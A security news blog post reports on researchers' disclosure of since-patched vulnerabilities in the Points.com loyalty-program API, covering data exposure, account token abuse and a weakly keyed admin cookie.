Search This Blog

Powered by Blogger.

Blog Archive

Labels

Hackers Have Scored Unlimited Airline Miles, Targeting One Platform

A group of security researcher discovered that the vulnerabilities in the Point.com API are most likely exploited to expose customer data.


TRAVEL REWARDS PROGRAMS, such as those provided by hotels and airlines, highlight the unique benefits of joining their club over others. However behind the scenes, several of these programs—including Delta SkyMiles, United MileagePlus, Hilton Honors, and Marriott Bonvoy—share the same digital infrastructure. The business Points, which offers a variety of services including a comprehensive application programming interface (API), provides the backend.

In a new finding, a group of security researcher discovered that the vulnerabilities in the Point.com API are most likely exploited to expose customer data, steal customers’ “loyalty currency,” (such as miles) or the Points global administration accounts in order to acquire control over the entire program.

About the Vulnerabilities

The researchers discovered a vulnerability that involved a manipulation that enabled them to move between internal sections of the Points API infrastructure and then query it for incentive program client orders. 22 million order records, which include information like customer rewards account numbers, addresses, phone numbers, email addresses, and partially completed credit card numbers, have been found in the system. A hacker could not just dump the entire data store at once since Points.com set limits on how many responses the system could provide at once. However, the researchers point out that this would have made it possible for the threat actor to look up for certain people of interest or to gradually drain data from the system over time.

Another bug found was apparently an API configuration issue that could allow a threat actor to enable account authorization token for a user with only their last names and reward numbers. These two pieces of information might have been obtained through earlier hacks or might have been gained by using the first weakness. By controlling client accounts and transferring miles or other reward points to themselves using this token, attackers might deplete the victim's accounts.

The researchers also noted that the two vulnerabilities shared similarities with the other bugs that were discovered earlier, one that impacted the Virgin Red and the other affected the United MileagePlus. However, these bugs too were patched by Points.com.

Most importantly, the researchers discovered a flaw in the Points.com global administration website, where an encrypted cookie issued to each user had been encrypted with a secret phrase "secret" itself, making it vulnerable. The researchers could essentially assume god-like ability to access any Points reward system and even offer accounts limitless miles or other perks by guessing this. They could then decrypt their cookie, reassign themselves global administrator credentials for the website, and re-encrypt their cookie.

Moreover, the researchers assured that their fixed indeed do their jobs right and claimed that Points were in fact very prompt and cooperative in addressing the disclosures.  

Share it:

Airline

Airline rewards

API Bug

Hackers

loyality points

Travel reward programs

Vulnerabilities and Exploits